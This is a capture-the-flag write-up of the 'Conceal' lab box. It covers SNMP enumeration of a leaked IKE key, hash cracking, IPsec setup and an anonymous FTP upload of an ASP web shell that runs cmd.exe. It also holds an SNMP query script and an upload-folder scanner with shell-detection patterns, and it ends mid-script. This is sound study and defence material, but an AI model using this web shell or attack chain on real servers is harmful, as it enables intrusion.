Conceal

18/05/2019

Conceal is a Windows box where nothing answers on TCP at first. To get started we enumerate an SNMP service, recover the IKE pre-shared key it leaks, and bring up an IPsec transport SA; only then do the machine's TCP ports become reachable. To get user, we upload a malicious ASP file over anonymous FTP into the IIS web root and use it to run PowerShell and get a shell. Finally, to escalate privileges, we use the JuicyPotato exploit.

User

A plain nmap scan reports every port as filtered, which usually means a host firewall is dropping our packets rather than the ports being closed.

root@kali:~/htb/conceal# nmap -sC -sV 10.10.10.116 
Starting Nmap 7.70 ( https://nmap.org ) at 2019-03-04 11:54 UTC
Nmap scan report for 10.10.10.116
Host is up (0.057s latency).
All 1000 scanned ports on 10.10.10.116 are filtered

Instead, we run masscan over the full TCP and UDP port ranges.

root@kali:~/htb/conceal# masscan -p1-65535,U:1-65535 10.10.10.116 --rate=1000 -e tun0

Starting masscan 1.0.4 (http://bit.ly/14GZzcT) at 2019-03-04 11:58:59 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 161/udp on 10.10.10.116 

Only 161/udp shows up as open, so we use nmap to identify what is running there.

root@kali:~/htb/conceal# nmap -sV -sU -p161 10.10.10.116
Starting Nmap 7.70 ( https://nmap.org ) at 2019-03-04 12:13 UTC
Nmap scan report for 10.10.10.116
Host is up (0.058s latency).

PORT    STATE SERVICE VERSION
161/udp open  snmp    SNMPv1 server (public)
Service Info: Host: Conceal

The box runs SNMP (Simple Network Management Protocol), which exposes management data about the host: system description, local users, interfaces, listening ports, processes and installed software. The community string is the default read-only "public", so snmp-check can walk all of it without any credentials.

root@kali:~/htb/conceal# snmp-check 10.10.10.116
snmp-check v1.9 - SNMP enumerator
Copyright (c) 2005-2015 by Matteo Cantoni (www.nothink.org)

[+] Try to connect to 10.10.10.116:161 using SNMPv1 and community 'public'

[*] System information:

  Host IP address               : 10.10.10.116
  Hostname                      : Conceal
  Description                   : Hardware: Intel64 Family 6 Model 79 Stepping 1 AT/AT COMPATIBLE - Software: Windows Version 6.3 (Build 15063 Multiprocessor Free)
  Contact                       : IKE VPN password PSK - 9C8B1A372B1878851BE2C097031B6E43
  Location                      : -
  Uptime snmp                   : 13:58:55.20
  Uptime system                 : 13:58:19.67
  System date                   : 2019-3-4 12:04:54.5
  Domain                        : WORKGROUP

[*] User accounts:

  Guest               
  Destitute           
  Administrator       
  DefaultAccount      

[*] Network information:

  IP forwarding enabled         : no
  Default TTL                   : 128
  TCP segments received         : 249336
  TCP segments sent             : 8
  TCP segments retrans          : 4
  Input datagrams               : 445397
  Delivered datagrams           : 378229
  Output datagrams              : 9284

[*] Network interfaces:

  Interface                     : [ up ] Software Loopback Interface 1
  Id                            : 1
  Mac Address                   : :::::
  Type                          : softwareLoopback
  Speed                         : 1073 Mbps
  MTU                           : 1500
  In octets                     : 0
  Out octets                    : 0

  Interface                     : [ down ] WAN Miniport (IKEv2)
  Id                            : 2
  Mac Address                   : :::::
  Type                          : unknown
  Speed                         : 0 Mbps
  MTU                           : 0
  In octets                     : 0
  Out octets                    : 0

  Interface                     : [ down ] WAN Miniport (PPTP)
  Id                            : 3
  Mac Address                   : :::::
  Type                          : unknown
  Speed                         : 0 Mbps
  MTU                           : 0
  In octets                     : 0
  Out octets                    : 0

  Interface                     : [ down ] Microsoft Kernel Debug Network Adapter
  Id                            : 4
  Mac Address                   : :::::
  Type                          : ethernet-csmacd
  Speed                         : 0 Mbps
  MTU                           : 0
  In octets                     : 0
  Out octets                    : 0

  Interface                     : [ down ] WAN Miniport (L2TP)
  Id                            : 5
  Mac Address                   : :::::
  Type                          : unknown
  Speed                         : 0 Mbps
  MTU                           : 0
  In octets                     : 0
  Out octets                    : 0

  Interface                     : [ down ] Teredo Tunneling Pseudo-Interface
  Id                            : 6
  Mac Address                   : 00:00:00:00:00:00
  Type                          : unknown
  Speed                         : 0 Mbps
  MTU                           : 0
  In octets                     : 0
  Out octets                    : 0

  Interface                     : [ down ] WAN Miniport (IP)
  Id                            : 7
  Mac Address                   : :::::
  Type                          : ethernet-csmacd
  Speed                         : 0 Mbps
  MTU                           : 0
  In octets                     : 0
  Out octets                    : 0

  Interface                     : [ down ] WAN Miniport (SSTP)
  Id                            : 8
  Mac Address                   : :::::
  Type                          : unknown
  Speed                         : 0 Mbps
  MTU                           : 0
  In octets                     : 0
  Out octets                    : 0

  Interface                     : [ down ] WAN Miniport (IPv6)
  Id                            : 9
  Mac Address                   : :::::
  Type                          : ethernet-csmacd
  Speed                         : 0 Mbps
  MTU                           : 0
  In octets                     : 0
  Out octets                    : 0

  Interface                     : [ up ] Intel(R) 82574L Gigabit Network Connection
  Id                            : 10
  Mac Address                   : 00:50:56:b9:8d:4c
  Type                          : ethernet-csmacd
  Speed                         : 1000 Mbps
  MTU                           : 1500
  In octets                     : 244445065
  Out octets                    : 930466

  Interface                     : [ down ] WAN Miniport (PPPOE)
  Id                            : 11
  Mac Address                   : :::::
  Type                          : ppp
  Speed                         : 0 Mbps
  MTU                           : 0
  In octets                     : 0
  Out octets                    : 0

  Interface                     : [ down ] WAN Miniport (Network Monitor)
  Id                            : 12
  Mac Address                   : :::::
  Type                          : ethernet-csmacd
  Speed                         : 0 Mbps
  MTU                           : 0
  In octets                     : 0
  Out octets                    : 0

  Interface                     : [ up ] Intel(R) 82574L Gigabit Network Connection-WFP Native MAC Layer LightWeight Filter-0000
  Id                            : 13
  Mac Address                   : 00:50:56:b9:8d:4c
  Type                          : ethernet-csmacd
  Speed                         : 1000 Mbps
  MTU                           : 1500
  In octets                     : 244445065
  Out octets                    : 930466

  Interface                     : [ up ] Intel(R) 82574L Gigabit Network Connection-QoS Packet Scheduler-0000
  Id                            : 14
  Mac Address                   : 00:50:56:b9:8d:4c
  Type                          : ethernet-csmacd
  Speed                         : 1000 Mbps
  MTU                           : 1500
  In octets                     : 244445065
  Out octets                    : 930466

  Interface                     : [ up ] Intel(R) 82574L Gigabit Network Connection-WFP 802.3 MAC Layer LightWeight Filter-0000
  Id                            : 15
  Mac Address                   : 00:50:56:b9:8d:4c
  Type                          : ethernet-csmacd
  Speed                         : 1000 Mbps
  MTU                           : 1500
  In octets                     : 244445065
  Out octets                    : 930466


[*] Network IP:

  Id                    IP Address            Netmask               Broadcast           
  10                    10.10.10.116          255.255.255.0         1                   
  1                     127.0.0.1             255.0.0.0             1                   

[*] Routing information:

  Destination           Next hop              Mask                  Metric              
  0.0.0.0               10.10.10.2            0.0.0.0               281                 
  10.10.10.0            10.10.10.116          255.255.255.0         281                 
  10.10.10.116          10.10.10.116          255.255.255.255       281                 
  10.10.10.255          10.10.10.116          255.255.255.255       281                 
  127.0.0.0             127.0.0.1             255.0.0.0             331                 
  127.0.0.1             127.0.0.1             255.255.255.255       331                 
  127.255.255.255       127.0.0.1             255.255.255.255       331                 
  224.0.0.0             127.0.0.1             240.0.0.0             331                 
  255.255.255.255       127.0.0.1             255.255.255.255       331                 

[*] TCP connections and listening ports:

  Local address         Local port            Remote address        Remote port           State               
  0.0.0.0               21                    0.0.0.0               0                     listen              
  0.0.0.0               80                    0.0.0.0               0                     listen              
  0.0.0.0               135                   0.0.0.0               0                     listen              
  0.0.0.0               445                   0.0.0.0               0                     listen              
  0.0.0.0               49664                 0.0.0.0               0                     listen              
  0.0.0.0               49665                 0.0.0.0               0                     listen              
  0.0.0.0               49666                 0.0.0.0               0                     listen              
  0.0.0.0               49667                 0.0.0.0               0                     listen              
  0.0.0.0               49668                 0.0.0.0               0                     listen              
  0.0.0.0               49669                 0.0.0.0               0                     listen              
  0.0.0.0               49670                 0.0.0.0               0                     listen              
  10.10.10.116          139                   0.0.0.0               0                     listen              

[*] Listening UDP ports:

  Local address         Local port          
  0.0.0.0               123                 
  0.0.0.0               161                 
  0.0.0.0               500                 
  0.0.0.0               4500                
  0.0.0.0               5050                
  0.0.0.0               5353                
  0.0.0.0               5355                
  0.0.0.0               56854               
  10.10.10.116          137                 
  10.10.10.116          138                 
  10.10.10.116          1900                
  10.10.10.116          64308               
  127.0.0.1             1900                
  127.0.0.1             64309               

[*] Network services:

  Index                 Name                
  0                     Power               
  1                     Server              
  2                     Themes              
  3                     IP Helper           
  4                     DNS Client          
  5                     Data Usage          
  6                     Superfetch          
  7                     DHCP Client         
  8                     Time Broker         
  9                     TokenBroker         
  10                    Workstation         
  11                    SNMP Service        
  12                    User Manager        
  13                    VMware Tools        
  14                    Windows Time        
  15                    CoreMessaging       
  16                    Plug and Play       
  17                    Print Spooler       
  18                    Windows Audio       
  19                    SSDP Discovery      
  20                    Task Scheduler      
  21                    Windows Search      
  22                    Security Center     
  23                    Storage Service     
  24                    Windows Firewall    
  25                    CNG Key Isolation   
  26                    COM+ Event System   
  27                    Windows Event Log   
  28                    IPsec Policy Agent  
  29                    Geolocation Service 
  30                    Group Policy Client 
  31                    RPC Endpoint Mapper 
  32                    Data Sharing Service
  33                    Device Setup Manager
  34                    Network List Service
  35                    System Events Broker
  36                    User Profile Service
  37                    Base Filtering Engine
  38                    Local Session Manager
  39                    Microsoft FTP Service
  40                    TCP/IP NetBIOS Helper
  41                    Cryptographic Services
  42                    Tile Data model server
  43                    COM+ System Application
  44                    Diagnostic Service Host
  45                    Shell Hardware Detection
  46                    State Repository Service
  47                    Diagnostic Policy Service
  48                    Network Connection Broker
  49                    Security Accounts Manager
  50                    Network Location Awareness
  51                    Windows Connection Manager
  52                    Windows Font Cache Service
  53                    Remote Procedure Call (RPC)
  54                    DCOM Server Process Launcher
  55                    Windows Audio Endpoint Builder
  56                    Application Host Helper Service
  57                    Network Store Interface Service
  58                    Client License Service (ClipSVC)
  59                    Distributed Link Tracking Client
  60                    System Event Notification Service
  61                    World Wide Web Publishing Service
  62                    Connected Devices Platform Service
  63                    Windows Defender Antivirus Service
  64                    Windows Management Instrumentation
  65                    Windows Process Activation Service
  66                    Distributed Transaction Coordinator
  67                    IKE and AuthIP IPsec Keying Modules
  68                    Microsoft Account Sign-in Assistant
  69                    VMware CAF Management Agent Service
  70                    VMware Physical Disk Helper Service
  71                    Background Intelligent Transfer Service
  72                    Background Tasks Infrastructure Service
  73                    Program Compatibility Assistant Service
  74                    VMware Alias Manager and Ticket Service
  75                    Connected User Experiences and Telemetry
  76                    WinHTTP Web Proxy Auto-Discovery Service
  77                    Windows Defender Security Centre Service
  78                    Windows Push Notifications System Service
  79                    Windows Defender Antivirus Network Inspection Service
  80                    Windows Driver Foundation - User-mode Driver Framework

[*] Processes:

  Id                    Status                Name                  Path                  Parameters          
  1                     running               System Idle Process                                             
  4                     running               System                                                          
  280                   running               svchost.exe           C:\Windows\system32\  -k LocalServiceNoNetwork
  312                   running               smss.exe                                                        
  352                   running               svchost.exe           C:\Windows\System32\  -k LocalSystemNetworkRestricted
  396                   running               csrss.exe                                                       
  476                   running               wininit.exe                                                     
  496                   running               csrss.exe                                                       
  576                   running               winlogon.exe                                                    
  600                   running               services.exe                                                    
  628                   running               lsass.exe             C:\Windows\system32\                      
  708                   running               fontdrvhost.exe                                                 
  716                   running               fontdrvhost.exe                                                 
  724                   running               svchost.exe           C:\Windows\system32\  -k DcomLaunch       
  824                   running               svchost.exe           C:\Windows\system32\  -k RPCSS            
  840                   running               svchost.exe           C:\Windows\system32\  -k LocalService     
  928                   running               dwm.exe                                                         
  944                   running               svchost.exe           C:\Windows\system32\  -k netsvcs          
  1000                  running               svchost.exe           C:\Windows\System32\  -k LocalServiceNetworkRestricted
  1052                  running               svchost.exe           C:\Windows\System32\  -k NetworkService   
  1116                  running               vmacthlp.exe          C:\Program Files\VMware\VMware Tools\                      
  1200                  running               SearchProtocolHost.exe  C:\Windows\system32\  Global\UsGthrFltPipeMssGthrPipe166_ Global\UsGthrCtrlFltPipeMssGthrPipe166 1 -2147483646 "Software\Microsoft\Windows Search" "M
  1288                  running               svchost.exe           C:\Windows\System32\  -k LocalServiceNetworkRestricted
  1348                  running               Memory Compression                                              
  1356                  running               dllhost.exe           C:\Windows\system32\  /Processid:{02D4B3F1-FD88-11D1-960D-00805FC79235}
  1400                  running               svchost.exe           C:\Windows\System32\  -k LocalServiceNetworkRestricted
  1408                  running               svchost.exe           C:\Windows\system32\  -k LocalServiceNetworkRestricted
  1520                  running               spoolsv.exe           C:\Windows\System32\                      
  1772                  running               svchost.exe           C:\Windows\system32\  -k apphost          
  1792                  running               svchost.exe           C:\Windows\System32\  -k utcsvc           
  1808                  running               svchost.exe           C:\Windows\system32\  -k ftpsvc           
  1852                  running               SearchFilterHost.exe  C:\Windows\system32\  0 692 696 704 8192 700
  1876                  running               SecurityHealthService.exe                                            
  1900                  running               snmp.exe              C:\Windows\System32\                      
  1916                  running               svchost.exe           C:\Windows\system32\  -k iissvcs          
  1924                  running               vmtoolsd.exe          C:\Program Files\VMware\VMware Tools\                      
  1932                  running               VGAuthService.exe     C:\Program Files\VMware\VMware Tools\VMware VGAuth\                      
  1940                  running               ManagementAgentHost.exe  C:\Program Files\VMware\VMware Tools\VMware CAF\pme\bin\                      
  1952                  running               MsMpEng.exe                                                     
  1980                  running               LogonUI.exe                                 /flags:0x0 /state0:0xa39d1055 /state1:0x41c64e6d
  2576                  running               svchost.exe           C:\Windows\system32\  -k NetworkServiceNetworkRestricted
  2728                  running               SearchIndexer.exe     C:\Windows\system32\  /Embedding          
  3012                  running               WmiPrvSE.exe          C:\Windows\system32\wbem\                      
  3184                  running               NisSrv.exe                                                      
  3356                  running               msdtc.exe             C:\Windows\System32\                      
  3692                  running               svchost.exe           C:\Windows\system32\  -k LocalServiceAndNoImpersonation
  3748                  running               svchost.exe                                                     
  3844                  running               svchost.exe           C:\Windows\system32\  -k appmodel         
  4068                  running               svchost.exe           C:\Windows\system32\  -k LocalSystemNetworkRestricted

[*] Storage information:

  Description                   : ["C:\\ Label:  Serial Number 9606be7b"]
  Device id                     : [#<SNMP::Integer:0x0000563458c29c90 @value=1>]
  Filesystem type               : ["unknown"]
  Device unit                   : [#<SNMP::Integer:0x0000563458c27df0 @value=4096>]
  Memory size                   : 59.51 GB
  Memory used                   : 10.85 GB

  Description                   : ["D:\\"]
  Device id                     : [#<SNMP::Integer:0x0000563458c1a6a0 @value=2>]
  Filesystem type               : ["unknown"]
  Device unit                   : [#<SNMP::Integer:0x0000563458c18990 @value=0>]
  Memory size                   : 0 bytes
  Memory used                   : 0 bytes

  Description                   : ["Virtual Memory"]
  Device id                     : [#<SNMP::Integer:0x0000563458bfb2f0 @value=3>]
  Filesystem type               : ["unknown"]
  Device unit                   : [#<SNMP::Integer:0x0000563458bf9518 @value=65536>]
  Memory size                   : 3.12 GB
  Memory used                   : 794.69 MB

  Description                   : ["Physical Memory"]
  Device id                     : [#<SNMP::Integer:0x0000563458be7ea8 @value=4>]
  Filesystem type               : ["unknown"]
  Device unit                   : [#<SNMP::Integer:0x0000563458be60f8 @value=65536>]
  Memory size                   : 2.00 GB
  Memory used                   : 703.06 MB


[*] File system information:

  Index                         : 1
  Mount point                   : 
  Remote mount point            : -
  Access                        : 1
  Bootable                      : 0

[*] Device information:

  Id                    Type                  Status                Descr               
  1                     unknown               running               Microsoft XPS Document Writer v4
  2                     unknown               running               Microsoft Print To PDF
  3                     unknown               running               Microsoft Shared Fax Driver
  4                     unknown               running               Unknown Processor Type
  5                     unknown               running               Unknown Processor Type
  6                     unknown               unknown               Software Loopback Interface 1
  7                     unknown               unknown               WAN Miniport (IKEv2)
  8                     unknown               unknown               WAN Miniport (PPTP) 
  9                     unknown               unknown               Microsoft Kernel Debug Network Adapter
  10                    unknown               unknown               WAN Miniport (L2TP) 
  11                    unknown               unknown               Teredo Tunneling Pseudo-Interface
  12                    unknown               unknown               WAN Miniport (IP)   
  13                    unknown               unknown               WAN Miniport (SSTP) 
  14                    unknown               unknown               WAN Miniport (IPv6) 
  15                    unknown               unknown               Intel(R) 82574L Gigabit Network Connection
  16                    unknown               unknown               WAN Miniport (PPPOE)
  17                    unknown               unknown               WAN Miniport (Network Monitor)
  18                    unknown               unknown               Intel(R) 82574L Gigabit Network Connection-WFP Native MAC Layer
  19                    unknown               unknown               Intel(R) 82574L Gigabit Network Connection-QoS Packet Scheduler-
  20                    unknown               unknown               Intel(R) 82574L Gigabit Network Connection-WFP 802.3 MAC Layer L
  21                    unknown               unknown               D:\                 
  22                    unknown               running               Fixed Disk          
  23                    unknown               running               IBM enhanced (101- or 102-key) keyboard, Subtype=(0)

[*] Software components:

  Index                 Name                
  1                     Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161
  2                     VMware Tools        
  3                     Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161

[*] IIS server information:

  TotalBytesSentLowWord         : 0
  TotalBytesReceivedLowWord     : 0
  TotalFilesSent                : 0
  CurrentAnonymousUsers         : 0
  CurrentNonAnonymousUsers      : 0
  TotalAnonymousUsers           : 0
  TotalNonAnonymousUsers        : 0
  MaxAnonymousUsers             : 0
  MaxNonAnonymousUsers          : 0
  CurrentConnections            : 0
  MaxConnections                : 0
  ConnectionAttempts            : 0
  LogonAttempts                 : 0
  Gets                          : 0
  Posts                         : 0
  Heads                         : 0
  Others                        : 0
  CGIRequests                   : 0
  BGIRequests                   : 0
  NotFoundErrors                : 0

The output contains a lot of useful information (local users such as Destitute, TCP listeners on 21, 80, 135, 139 and 445, UDP listeners on 500 and 4500 for IKE/NAT-T, and the IIS and FTP services), but the item to focus on is the system contact field: IKE VPN password PSK - 9C8B1A372B1878851BE2C097031B6E43.
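The following is an added example and not part of the original writeup: it shows what snmp-check does on the wire for the one object that matters here, a single SNMPv1 GetRequest for sysContact.0 (OID 1.3.6.1.2.1.1.4.0) with the community string public, and a decoder for the GetResponse. The agent address and community string are taken from the scan above; the sample response used to exercise the decoder is constructed in the code, not captured traffic. The point it makes is that a read-only "public" community is a disclosure channel: one unauthenticated UDP datagram returns the hash.

```python
import socket
import struct

# From the scan above: the agent, its read-only community and the OID whose
# value (sysContact.0) carried the PSK hash.
AGENT = "10.10.10.116"
COMMUNITY = "public"
SYS_CONTACT = "1.3.6.1.2.1.1.4.0"

def ber_len(n):
    """BER definite length: short form below 128, long form otherwise."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body

def tlv(tag, body):
    return bytes([tag]) + ber_len(len(body)) + body

def ber_int(v):
    """INTEGER, minimal two's-complement encoding."""
    n = 1
    while not -(1 << (8 * n - 1)) <= v < (1 << (8 * n - 1)):
        n += 1
    return tlv(0x02, v.to_bytes(n, "big", signed=True))

def ber_oid(dotted):
    """OBJECT IDENTIFIER: first two arcs packed as 40*x+y, the rest base-128."""
    arcs = [int(x) for x in dotted.split(".")]
    out = [40 * arcs[0] + arcs[1]]
    for a in arcs[2:]:
        chunk = [a & 0x7F]
        a >>= 7
        while a:
            chunk.append(0x80 | (a & 0x7F))
            a >>= 7
        out.extend(reversed(chunk))
    return tlv(0x06, bytes(out))

def build_get_request(oid, community=COMMUNITY, request_id=1):
    """SNMPv1 Message { version 0, community, GetRequest-PDU [0] { ids, varbinds } }."""
    varbind = tlv(0x30, ber_oid(oid) + b"\x05\x00")  # value is NULL in a request
    pdu = tlv(0xA0, ber_int(request_id) + ber_int(0) + ber_int(0) + tlv(0x30, varbind))
    return tlv(0x30, ber_int(0) + tlv(0x04, community.encode()) + pdu)

def build_get_response(oid, value, community=COMMUNITY, request_id=1):
    """GetResponse-PDU [2] carrying an OCTET STRING, shaped as an agent would answer."""
    varbind = tlv(0x30, ber_oid(oid) + tlv(0x04, value.encode()))
    pdu = tlv(0xA2, ber_int(request_id) + ber_int(0) + ber_int(0) + tlv(0x30, varbind))
    return tlv(0x30, ber_int(0) + tlv(0x04, community.encode()) + pdu)

def parse_tlv(buf, pos=0):
    """Return (tag, body, position after the element); definite lengths only."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:
        n = length & 0x7F
        length, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    return tag, buf[pos:pos + length], pos + length

def parse_sequence(body):
    items, pos = [], 0
    while pos < len(body):
        tag, inner, pos = parse_tlv(body, pos)
        items.append((tag, inner))
    return items

def decode_oid(raw):
    arcs, v = [raw[0] // 40, raw[0] % 40], 0
    for b in raw[1:]:
        v = (v << 7) | (b & 0x7F)
        if not b & 0x80:
            arcs.append(v)
            v = 0
    return ".".join(map(str, arcs))

def decode_value(tag, raw):
    if tag == 0x04:                          # OCTET STRING
        return raw.decode("utf-8", "replace")
    if tag in (0x02, 0x41, 0x42, 0x43):      # INTEGER, Counter32, Gauge32, TimeTicks
        return int.from_bytes(raw, "big", signed=(tag == 0x02))
    return raw                               # other types are left raw

def parse_get_response(data):
    """Return {oid: value} from a GetResponse, raising on a non-zero error-status."""
    tag, body, _ = parse_tlv(data)
    if tag != 0x30:
        raise ValueError("not an SNMP message")
    _version, _community, (pdu_tag, pdu) = parse_sequence(body)
    if pdu_tag != 0xA2:
        raise ValueError("expected GetResponse-PDU, got tag 0x%02x" % pdu_tag)
    _req_id, (_, err), _err_index, (_, varbinds) = parse_sequence(pdu)
    if int.from_bytes(err, "big", signed=True):
        raise ValueError("agent returned error-status %d" % int.from_bytes(err, "big"))
    result = {}
    for _, vb in parse_sequence(varbinds):
        (_, oid), (vtag, raw) = parse_sequence(vb)
        result[decode_oid(oid)] = decode_value(vtag, raw)
    return result

def snmp_get(host, oid, community=COMMUNITY, timeout=3.0):
    """One unauthenticated UDP datagram to 161 is all it takes; not exercised offline."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(build_get_request(oid, community, request_id=0x1337), (host, 161))
        data, _ = s.recvfrom(65535)
    return parse_get_response(data)

# Constructed sample response (not captured traffic) with the value seen above.
SAMPLE_RESPONSE = build_get_response(
    SYS_CONTACT, "IKE VPN password PSK - 9C8B1A372B1878851BE2C097031B6E43")

if __name__ == "__main__":
    print(snmp_get(AGENT, SYS_CONTACT))
```

snmp-check simply issues a few hundred of these GetRequest/GetNext exchanges and pretty-prints the results; the defensive fix is the same either way: change or remove the public community, restrict the SNMP service to management hosts, and keep secrets out of sysContact.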

IKE (Internet Key Exchange) is the protocol that negotiates the security associations (SAs) used by IPsec; with PSK authentication, both peers must know the same pre-shared key to complete that negotiation.

The contact field gives us the PSK only as a 32-hex-digit hash. That length fits NTLM (an unsalted MD4 over the UTF-16LE password), so we run hashcat in mode 1000 (NTLM) against rockyou, and it falls straight away.

root@kali:~/htb/conceal# hashcat -m 1000 -a 0 pass /usr/share/wordlists/rockyou.txt --force
hashcat (v5.1.0) starting...
9c8b1a372b1878851be2c097031b6e43:Dudecake1!

Now we need the IKE parameters the responder will accept, which ike-scan negotiates for us.

root@kali:~/htb/conceal# ike-scan 10.10.10.116
Starting ike-scan 1.9.4 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
10.10.10.116	Main Mode Handshake returned HDR=(CKY-R=cc81ff8b4dbf4806) SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration(4)=0x00007080) VID=1e2b516905991c7d7c96fcbfb587e46100000009 (Windows-8) VID=4a131c81070358455c5728f20e95452f (RFC 3947 NAT-T) VID=90cb80913ebb696e086381b5ec427b1f (draft-ietf-ipsec-nat-t-ike-02\n) VID=4048b7d56ebce88525e7de7f00d6c2d3 (IKE Fragmentation) VID=fb1de3cdf341b7ea16b7e5be0855f120 (MS-Negotiation Discovery Capable) VID=e3a5966a76379fe707228231e5ce8652 (IKE CGA version 1)

This output confirms that the responder accepts IKEv1 Main Mode with 3DES encryption, SHA1 integrity, Diffie-Hellman group 2 (modp1024) and PSK authentication, and the vendor IDs identify it as a Windows host with NAT-T support.

To bring up IPsec we use strongSwan, following this guide, and define the following connection in /etc/ipsec.conf; every proposal value comes straight from the ike-scan output.

conn conceal
	# authenticate with the PSK stored in /etc/ipsec.secrets
	authby=psk
	# bring the SA up as soon as the daemon starts
	auto=start
	# ESP and IKE proposals matching what ike-scan returned
	esp=3des-sha1
	ike=3des-sha1-modp1024
	# ike-scan got a Main Mode handshake, i.e. IKEv1
	keyexchange=ikev1
	# host-to-host transport mode, no tunnel subnets
	type=transport
	right=10.10.10.116
	# only TCP traffic to the box is protected; UDP stays outside the SA
	rightsubnet=10.10.10.116[tcp/]

We also have to add the password we found before in /etc/ipsec.secrets.

10.10.10.116 : PSK "Dudecake1!"

Now we start the IPsec service and check the status; an established transport SA covering TCP to the box looks like this.

root@kali:~/htb/conceal# ipsec start
Starting strongSwan 5.7.2 IPsec [starter]...
root@kali:~/htb/conceal# ipsec status
Security Associations (1 up, 0 connecting):
     conceal[1]: ESTABLISHED 1 second ago, 10.10.16.38[10.10.16.38]...10.10.10.116[10.10.10.116]
     conceal{1}:  INSTALLED, TRANSPORT, reqid 1, ESP SPIs: c99933cf_i c3024e80_o
     conceal{1}:   10.10.16.38/32 === 10.10.10.116/32[tcp]

The snmp-check output listed TCP listeners on ports 21, 80, 135, 139, 445 and 49664-49670. With the SA up, those are reachable through IPsec (a TCP connect scan, nmap -sT, goes through the SA; UDP does not, because the policy only covers TCP).

We start with port 21, which is a Microsoft FTP server. Anonymous login is allowed, but the directory is empty.

root@kali:~/htb/conceal# ftp 10.10.10.116
Connected to 10.10.10.116.
220 Microsoft FTP Service
Name (10.10.10.116:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.

We can upload files, though, which will be useful later.

ftp> put caca
local: caca remote: caca
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
6 bytes sent in 0.00 secs (117.1875 kB/s)

Next is port 80, which serves IIS.

Running gobuster against it finds an /upload directory.

root@kali:~/htb/conceal# /opt/gobuster/gobuster -w /usr/share/wordlists/dirb/common.txt -u http://10.10.10.116/

=====================================================
Gobuster v2.0.1              OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://10.10.10.116/
[+] Threads      : 10
[+] Wordlist     : /usr/share/wordlists/dirb/common.txt
[+] Status codes : 200,204,301,302,307,403
[+] Timeout      : 10s
=====================================================
2019/03/04 16:32:03 Starting gobuster
=====================================================
/upload (Status: 301)
=====================================================
2019/03/04 16:33:40 Finished
=====================================================

It is a directory listing, and it contains the file we uploaded to the FTP server: the FTP root maps into the web root.

Requesting a page that does not exist returns an IIS error page.

The error page leaks the physical path, C:\inetpub\wwwroot\upload\dasds, which confirms where our FTP uploads land on disk and that anything we upload is served by IIS.

I tried to create malicious ASP files via msfvenom but they didn't work for me, so I finally wrote my own custom ASP file which executes a command on the machine, stores the output in a file and then prints the content of that file in the page.

<%
Set oWSH = Server.CreateObject("WScript.Shell")
Call oWSH.Run ("cmd.exe /c dir > C:\inetpub\wwwroot\upload\caca", 0, True)

Set fso  = CreateObject("Scripting.FileSystemObject")
Set file = fso.OpenTextFile("C:\inetpub\wwwroot\upload\caca", 1)
text = file.ReadAll
file.Close
%>
<%= text %>
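
The root cause here is that the directory the ftp server lets anonymous users write to is also served by IIS, so any uploaded file with a script extension becomes executable. As an added example (my own code, not part of the original write-up), the following Python script walks such a directory and flags files a defender would want to quarantine: anything with an ASP/ASP.NET extension, plus any file whose content carries the command-execution markers seen in the page above, even if it was renamed to an innocent extension. The sample directory it builds is constructed in a temporary folder so the script runs stand-alone; the extension set and markers are my choices, not something the page lists.

```python
"""Scan a web-writable upload directory for server-side script files.

Added example, not from the original write-up. The scenario above has one
folder that is both FTP-writable and served by IIS, so this walks such a
folder and reports files that would run as code if requested over HTTP.
The sample directory is constructed in a temp folder so the script is
self-contained.
"""
import os
import re
import tempfile

# Extensions that IIS hands to a script engine (classic ASP and ASP.NET).
SCRIPT_EXTENSIONS = {".asp", ".aspx", ".asa", ".ashx", ".asmx"}

# Content markers typical of command execution from ASP, as in the page above.
SUSPICIOUS_MARKERS = [
    re.compile(r"WScript\.Shell", re.I),
    re.compile(r"Scripting\.FileSystemObject", re.I),
    re.compile(r"cmd\.exe\s+/c", re.I),
    re.compile(r"powershell(\.exe)?\s", re.I),
    re.compile(r"System\.Diagnostics\.Process", re.I),
]


def classify_file(path):
    """Return a list of reasons this file is suspicious (empty if clean)."""
    reasons = []
    ext = os.path.splitext(path)[1].lower()
    if ext in SCRIPT_EXTENSIONS:
        reasons.append("executable extension " + ext)
    try:
        with open(path, "r", encoding="utf-8", errors="ignore") as fh:
            head = fh.read(64 * 1024)  # a web shell is small; bound the read for big uploads
    except OSError:
        return reasons
    for marker in SUSPICIOUS_MARKERS:
        if marker.search(head):
            reasons.append("content matches " + marker.pattern)
    return reasons


def scan_upload_dir(root):
    """Walk root and return {relative_path: [reasons]} for every flagged file."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            reasons = classify_file(full)
            if reasons:
                findings[os.path.relpath(full, root)] = reasons
    return findings


def build_sample_upload_dir():
    """Create a constructed upload directory mimicking the write-up's folder."""
    root = tempfile.mkdtemp(prefix="upload_")
    # A harmless text file, like the 'caca' test upload.
    with open(os.path.join(root, "caca"), "w") as fh:
        fh.write("test\n")
    # The command-executing ASP page from the write-up.
    with open(os.path.join(root, "shell.asp"), "w") as fh:
        fh.write('<%\nSet oWSH = Server.CreateObject("WScript.Shell")\n'
                 'Call oWSH.Run ("cmd.exe /c dir > C:\\inetpub\\wwwroot\\upload\\caca", 0, True)\n%>\n')
    # A renamed file: the extension is innocent, the content is not.
    with open(os.path.join(root, "notes.txt"), "w") as fh:
        fh.write("powershell -ExecutionPolicy Bypass -File C:\\x.ps1\n")
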